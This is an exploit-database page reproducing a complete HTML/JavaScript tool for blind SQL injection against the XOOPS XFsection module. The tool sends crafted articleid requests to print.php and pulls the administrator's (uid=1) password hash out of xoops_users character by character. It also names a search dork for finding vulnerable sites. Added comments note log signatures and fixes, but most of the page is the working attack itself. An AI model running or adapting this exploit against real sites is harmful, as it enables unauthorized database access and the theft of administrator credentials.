
Xoops Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit

🗓️ 04 Apr 2007 00:00:00 Reported by RootType
seebug
 seebug
🔗 www.seebug.org👁 53 Views

Xoops Module XFsection <= 1.07 articleid BLIND SQL Injection Exploit

Code

                                                &lt;html&gt;
&lt;head&gt;
&lt;title&gt;XOOPS&nbsp;Module&nbsp;XFsection&nbsp;&lt;=&nbsp;1.07&nbsp;(articleid)&nbsp;BLIND&nbsp;SQL&nbsp;Injection&nbsp;Exploit&lt;/title&gt;

&lt;script&nbsp;type=&quot;text/javascript&quot;&gt;

//'===============================================================================================
//'[Script&nbsp;Name:&nbsp;XOOPS&nbsp;Module&nbsp;XFsection&nbsp;&lt;=&nbsp;1.07&nbsp;(articleid)&nbsp;BLIND&nbsp;SQL&nbsp;Injection&nbsp;Exploit
//'[Coded&nbsp;by&nbsp;&nbsp;&nbsp;:&nbsp;ajann
//'[Author&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;ajann
//'[Contact&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;:(
//'[Dork&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;inurl:/modules/xfsection/
//'[S.Page&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;http://linux2.ohwada.net/
//'[$$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Free
//'[Using&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Write&nbsp;Target&nbsp;after&nbsp;Submit&nbsp;Click
//'===============================================================================================


// nesneyarat ("create object"): returns the HTTP request object the page uses
// for every probe. When navigator.appName reports "Microsoft Internet Explorer"
// it instantiates the legacy ActiveX "Microsoft.XMLHTTP" object; in every other
// browser it uses the native XMLHttpRequest constructor.
// Local names are Turkish: nesne = object, tarayici = browser.
&nbsp;&nbsp;&nbsp;function&nbsp;nesneyarat()&nbsp;{

&nbsp;var&nbsp;nesne;
&nbsp;var&nbsp;tarayici&nbsp;=&nbsp;navigator.appName;

&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(tarayici&nbsp;==&nbsp;&quot;Microsoft&nbsp;Internet&nbsp;Explorer&quot;){
&nbsp;nesne&nbsp;=&nbsp;new&nbsp;ActiveXObject(&quot;Microsoft.XMLHTTP&quot;);
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;else&nbsp;{
&nbsp;nesne&nbsp;=&nbsp;new&nbsp;XMLHttpRequest();

&nbsp;&nbsp;}
return&nbsp;nesne;
}

// Single page-wide request object: islemlink() re-opens it for each probe and
// cevapFonksiyonu() reads the response from it.
&nbsp;var&nbsp;http&nbsp;=&nbsp;nesneyarat();



// islemlink: assembles one probe URL from the form fields and sends it as a GET.
//
// The URL is built, in order, from:
//   'adresim' field (scheme + host) + 'path' field
//   + "/modules/xfsection/print.php?articleid=" + 'genreid' field (article id)
//   + adresyolla (SQL fragment that precedes the character position)
//   + 'karakter' field (character position) + charyolla (SQL fragment after it)
// so everything following the numeric article id is SQL text carried inside the
// articleid query parameter.
//
// The five working variables are assigned without var/let and therefore become
// implicit globals. The response is handled asynchronously by cevapFonksiyonu.
//
// NOTE(review), defender view: the vulnerable print.php is not shown on this
// page. The probe presumably depends on articleid reaching the SQL statement
// without integer validation; casting the parameter to an integer or binding it
// as a query parameter would close that path -- confirm against the module
// source. In web-server access logs these requests appear as GETs to
// /modules/xfsection/print.php whose articleid value contains "/**/AND/**/"
// and "ascii(substring(".
&nbsp;&nbsp;&nbsp;function&nbsp;islemlink(adresyolla,charyolla)&nbsp;{

genreidim=document.getElementById('genreid').value
file=&quot;/modules/xfsection/print.php?articleid=&quot;&nbsp;+&nbsp;genreidim
pathim=document.getElementById('path').value&nbsp;+&nbsp;file
karakterim=document.getElementById('karakter').value&nbsp;+&nbsp;charyolla
adres=document.getElementById('adresim').value&nbsp;+&nbsp;pathim&nbsp;+&nbsp;&nbsp;adresyolla&nbsp;+&nbsp;karakterim


&nbsp;

&nbsp;http.open('get',&nbsp;adres);
&nbsp;http.onreadystatechange&nbsp;=&nbsp;cevapFonksiyonu;
&nbsp;http.send(null);
&nbsp;&nbsp;&nbsp;

}



// cevapFonksiyonu ("response function"): onreadystatechange handler for the
// shared request object. Once readyState reaches 4 (request complete) it copies
// the raw response body into the 'mesaj' textarea and calls yonlendir() to
// classify it. The HTTP status code is not checked.
&nbsp;&nbsp;&nbsp;function&nbsp;cevapFonksiyonu()&nbsp;{
&nbsp;if(http.readyState&nbsp;==&nbsp;4){
document.getElementById('mesaj').value&nbsp;=&nbsp;http.responseText;
yonlendir();

}
}



// yonlendir: classifies the stored response as true or false. It searches the
// text held in the 'mesaj' textarea for one fixed markup string (a span styled
// "font-size: large;") and shows alert('TRUEEEEEEE') when the string is present,
// alert('False') when it is absent. The two if statements test the same
// condition with opposite outcomes.
//
// NOTE(review), defender view: the marker is presumably markup that print.php
// emits only when an article row is returned, so page content itself acts as
// the yes/no signal. Because no database error text is involved, hiding SQL
// error messages does not remove this signal; the query has to stop accepting
// injected conditions.
function&nbsp;yonlendir()&nbsp;{

&nbsp;&nbsp;if&nbsp;(document.getElementById('mesaj').value.indexOf('&lt;span&nbsp;style=&quot;font-size:&nbsp;large;&quot;&gt;',&nbsp;0)&nbsp;==&nbsp;-1)&nbsp;{
&nbsp;alert('False');


&nbsp;&nbsp;}

&nbsp;if&nbsp;(document.getElementById('mesaj').value.indexOf('&lt;span&nbsp;style=&quot;font-size:&nbsp;large;&quot;&gt;',&nbsp;0)&nbsp;!=&nbsp;-1)&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;alert('TRUEEEEEEE');
&nbsp;&nbsp;&nbsp;}
&nbsp;


&nbsp;&nbsp;}

// dal: click handler for the 'buton' submit button (wired through its onclick
// attribute). It is a hand-unrolled state machine keyed on the button's label:
// each click sends exactly one probe through islemlink() and then renames the
// button to the next candidate.
//
// Every branch performs the same four steps:
//   1. disable the button;
//   2. call islemlink() with two string arguments -- the SQL text before the
//      character position and the SQL text after it. The condition compares the
//      ASCII code of one character of the `pass` column (row uid=1 of table
//      xoops_users) with a fixed candidate code;
//   3. set the button label to the next candidate, or "Finished" after 'f';
//   4. re-enable the button after 2000 ms. The re-enable statement is passed to
//      setTimeout as a string, so it is evaluated as code.
//
// Candidate codes are 48-57 ('0'-'9') followed by 97-102 ('a'-'f'), i.e. the
// lowercase hex alphabet, which matches the form's "Md5 Character 1-32" label.
// The trailing "/*" in the second fragment opens a SQL comment, presumably to
// discard whatever follows articleid in the original statement.
//
// NOTE(review), defender view: one character position produces up to 16 GET
// requests that are identical except for the number after "=" in the articleid
// value; a run of such requests from one client is a practical log and WAF
// signature. The value being read is the password hash of uid=1 (presumably the
// site administrator -- confirm). If this pattern appears in logs, treat that
// credential as exposed and rotate it.
function&nbsp;dal()&nbsp;{

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(0)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=48)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(1)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(1)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=49)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(2)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(2)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=50)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(3)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(3)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=51)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(4)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(4)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=52)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(5)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(5)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=53)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(6)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(6)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=54)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(7)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(7)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=55)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(8)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(8)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=56)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(9)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(9)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=57)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(a)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(a)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=97)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(b)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(b)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=98)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(c)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(c)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=99)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(d)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(d)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=100)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(e)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(e)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=101)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Test&nbsp;Character(f)&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}

if&nbsp;(document.getElementById('buton').value&nbsp;==&nbsp;&quot;Test&nbsp;Character(f)&quot;)&nbsp;{
&nbsp;
&nbsp;document.getElementById('buton').disabled&nbsp;=&nbsp;true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=102)/*');
&nbsp;&nbsp;&nbsp;document.getElementById('buton').value&nbsp;=&nbsp;&quot;Finished&quot;
&nbsp;setTimeout(&quot;document.getElementById('buton').disabled&nbsp;=&nbsp;false;&quot;,2000);
return&nbsp;false;

&nbsp;}



&nbsp;&nbsp;}


&lt;/script&gt;

&nbsp;&nbsp;&nbsp;&lt;/head&gt;

&nbsp;&lt;body&nbsp;bgcolor=&quot;#000000&quot;&gt;

&lt;center&gt;

&lt;p&gt;&lt;b&gt;&lt;font&nbsp;face=&quot;Verdana&quot;&nbsp;size=&quot;2&quot;&nbsp;color=&quot;#008000&quot;&gt;XOOPS&nbsp;Module&nbsp;XFsection&nbsp;&lt;=&nbsp;1.07&nbsp;(articleid)&nbsp;BLIND&nbsp;SQL&nbsp;Injection&nbsp;Exploit&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;/p&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&lt;b&gt;&lt;font&nbsp;face=&quot;Arial&quot;&nbsp;size=&quot;1&quot;&nbsp;color=&quot;#FF0000&quot;&gt;Target:&lt;/font&gt;&lt;font&nbsp;face=&quot;Arial&quot;&nbsp;size=&quot;1&quot;&nbsp;color=&quot;#808080&quot;&gt;[http://[target]/&lt;/font&gt;&lt;font&nbsp;color=&quot;#00FF00&quot;&nbsp;size=&quot;2&quot;&nbsp;face=&quot;Arial&quot;&gt;
&nbsp;&nbsp;&lt;/font&gt;&lt;font&nbsp;color=&quot;#FF0000&quot;&nbsp;size=&quot;2&quot;&gt;&amp;nbsp;&lt;/font&gt;&lt;/b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&nbsp;&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;adresim&quot;&nbsp;size=&quot;20&quot;&nbsp;style=&quot;background-color:&nbsp;#808000&quot;&nbsp;onmouseover=&quot;javascript:this.style.background='#808080';&quot;&nbsp;onmouseout=&quot;javascript:this.style.background='#808000';&quot;&nbsp;value=&quot;http://&quot;&gt;&lt;/p&gt;
&lt;br&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&lt;b&gt;&lt;font&nbsp;face=&quot;Arial&quot;&nbsp;size=&quot;1&quot;&nbsp;color=&quot;#FF0000&quot;&gt;&amp;nbsp;Path:&lt;/font&gt;&lt;font&nbsp;face=&quot;Arial&quot;&nbsp;size=&quot;1&quot;&nbsp;color=&quot;#808080&quot;&gt;[http://[target]/[scriptpath]&amp;nbsp;&amp;nbsp;&amp;nbsp;&nbsp;&lt;/font&gt;&lt;/b&gt;
&nbsp;&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;path&quot;&nbsp;size=&quot;20&quot;&nbsp;style=&quot;background-color:&nbsp;#808000&quot;&nbsp;onmouseover=&quot;javascript:this.style.background='#808080';&quot;&nbsp;onmouseout=&quot;javascript:this.style.background='#808000';&quot;&nbsp;value=&quot;/&quot;&gt;
&nbsp;&nbsp;&lt;p&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&lt;b&gt;&lt;font&nbsp;face=&quot;Arial&quot;&nbsp;size=&quot;1&quot;&nbsp;color=&quot;#FF0000&quot;&gt;&amp;nbsp;Character:&lt;/font&gt;&lt;font&nbsp;face=&quot;Arial&quot;&nbsp;size=&quot;1&quot;&nbsp;color=&quot;#808080&quot;&gt;[Md5&nbsp;
&nbsp;&nbsp;Character&nbsp;1-32]&amp;nbsp;&amp;nbsp;&nbsp;&lt;/font&gt;&lt;/b&gt;
&nbsp;&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;karakter&quot;&nbsp;size=&quot;20&quot;&nbsp;style=&quot;background-color:&nbsp;#808000&quot;&nbsp;onmouseover=&quot;javascript:this.style.background='#808080';&quot;&nbsp;onmouseout=&quot;javascript:this.style.background='#808000';&quot;&nbsp;value=&quot;1&quot;&gt;
&lt;/p&gt;
&nbsp;&nbsp;&lt;p&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&lt;b&gt;&lt;font&nbsp;face=&quot;Arial&quot;&nbsp;size=&quot;1&quot;&nbsp;color=&quot;#FF0000&quot;&gt;Article&nbsp;Id:&lt;/font&gt;&lt;font&nbsp;face=&quot;Arial&quot;&nbsp;size=&quot;1&quot;&nbsp;color=&quot;#808080&quot;&gt;[print.php?articleid=]&amp;nbsp;&amp;nbsp;&nbsp;&lt;/font&gt;&lt;/b&gt;
&nbsp;&nbsp;&lt;input&nbsp;type=&quot;text&quot;&nbsp;name=&quot;genreid&quot;&nbsp;size=&quot;20&quot;&nbsp;style=&quot;background-color:&nbsp;#808000&quot;&nbsp;onmouseover=&quot;javascript:this.style.background='#808080';&quot;&nbsp;onmouseout=&quot;javascript:this.style.background='#808000';&quot;&nbsp;value=&quot;1&quot;&gt;
&lt;/p&gt;
&nbsp;&nbsp;&lt;p&gt;&lt;input&nbsp;type=&quot;submit&quot;&nbsp;value=&quot;Test&nbsp;Character(0)&quot;&nbsp;name=&quot;buton&quot;&nbsp;onclick=&quot;dal();&quot;&gt;&lt;/p&gt;
&lt;br&gt;
&lt;textarea&nbsp;name=&quot;mesaj&quot;&nbsp;rows=&quot;1&quot;&nbsp;cols=&quot;20&quot;&nbsp;style=&quot;visibility:hidden&quot;&gt;&lt;/textarea&gt;&nbsp;&lt;br&gt;
&lt;p&gt;

&lt;b&gt;&lt;font&nbsp;face=&quot;Verdana&quot;&nbsp;size=&quot;2&quot;&nbsp;color=&quot;#008000&quot;&gt;ajann&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/p&gt;
&lt;/center&gt;


&nbsp;&lt;/body&gt;
&nbsp;&lt;/html&gt;

&nbsp;
                              


04 Apr 2007 00:00Current
7.1High risk
Vulners AI Score7.1
53